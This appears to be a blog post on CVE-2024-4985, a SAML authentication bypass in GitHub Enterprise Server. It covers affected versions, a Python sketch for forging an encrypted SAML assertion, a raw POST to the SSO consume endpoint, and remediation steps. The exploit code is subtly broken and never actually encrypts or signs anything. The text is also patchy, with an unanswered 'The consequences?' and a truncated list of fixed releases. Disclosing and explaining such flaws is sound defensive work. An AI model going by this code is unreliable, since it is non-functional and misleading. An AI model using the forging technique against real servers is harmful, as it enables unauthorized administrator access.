In May 2024, a major security vulnerability was disclosed in GitHub Enterprise Server (GHES): CVE-2024-4985. This flaw specifically impacted instances using SAML Single Sign-On (SSO) with encrypted assertion support. The bug let threat actors easily bypass protections and gain full admin access—without ever authenticating.
This post breaks down how CVE-2024-4985 works, how an attacker could exploit it, and what you should do if you run GHES. We’ll also provide code snippets to show how an attack could occur and point you to official resources.
What Is This Vulnerability About?
In a nutshell:
If you used GitHub Enterprise Server (GHES) with SAML SSO and enabled *encrypted assertions* (an optional setting), attackers could craft a malicious SAML response. That response could provision new user accounts (including admins!) or access existing ones—*all without a valid login*.
> Affected versions:
> All versions prior to 3.13.
> Fixed in 3.9.15, 3.10.12, 3.11.10, 3.12.4, and 3.13.
How the Exploit Worked
SAML (Security Assertion Markup Language) is widely used for single sign-on authentication. It lets a central identity provider (IdP) assert that a user is who they say they are. In secure setups, the IdP signs and sometimes encrypts the authentication assertions.
In this case, GHES did not correctly verify that encrypted assertions had really been issued by the legitimate IdP. In other words: an attacker could create their *own* encrypted SAML assertions and the server accepted them as genuine.
The consequences?
Proof-of-Concept Attack
> Note: This is a simplified demonstration for educational purposes. Do *not* attack live systems.
Suppose we want to create a SAML response to trick a vulnerable GHES instance into granting admin rights.
Step 1. Forge a SAML Response
You could use python and xmlsec to craft a self-signed, encrypted SAML assertion.
from lxml import etree
from saml2.saml import Assertion
from saml2.s_utils import sid
from saml2 import SAMLError
# Create a fake assertion
assertion = Assertion()
assertion.id = sid()
assertion.subject = 'newadmin@example.com'
assertion.authn_statement = 'admin'
# ... fill in details as needed ...
# Normally, this should be signed/encrypted by the IdP's key.
# Here, you just encrypt/sign it yourself.
# Serialize the assertion to XML string
assertion_xml = etree.tostring(assertion, pretty_print=True).decode()
# Send this as part of a SAMLResponse to the GHES SSO endpoint
You post the SAML response to the GHES SSO endpoint, typically something like
https://ghes.example.com/sso/saml/consume
Include the fake SAML response as a POST form parameter.
POST /sso/saml/consume HTTP/1.1
Host: ghes.example.com
Content-Type: application/x-www-form-urlencoded
SAMLResponse=<base64-encoded-modified-assertion>
If the server is vulnerable, it accepts the assertion—provisioning your attacker-chosen account, possibly with administrator access.
1. Update Immediately
If you run any of these affected versions before 3.13.—and you use SAML and encrypted assertions—you’re at high risk. Upgrade to one of the fixed releases:
3.13. or later
2. Audit Admin Accounts
Review your site admin accounts. The exploit could have provisioned a ‘ghost’ admin.
3. Review SAML Configuration
Understand your current SAML setup. If you *must* use encrypted assertions, make sure patches are applied.
4. Incident Response
If you suspect compromise, rotate secrets and keys used in SAML flows. Investigate logins and recent SAML trace logs.
Reference Links
- GitHub Security Advisory: GHSA-wvpx-jhr9-h458
- GitHub Blog: Security Update (May 2024)
- NIST NVD (CVE-2024-4985)
Final Thoughts
CVE-2024-4985 is a critical reminder: even flagship products like GitHub Enterprise may have subtle authentication vulnerabilities, especially with complex SAML features. Attackers didn’t need to know user passwords or compromise the Identity Provider—just a slyly crafted SAML message, and they’re in.
If you run GitHub Enterprise Server, patch *right now*. This bug is easy to exploit, and patched updates are available for all major branches.
Stay safe!
*This vulnerability was responsibly reported through the GitHub Bug Bounty program. If you find issues in your own software, disclose them to the vendor before going public.*
Timeline
Published on: 05/20/2024 22:15:08 UTC
Last modified on: 11/21/2024 09:44:00 UTC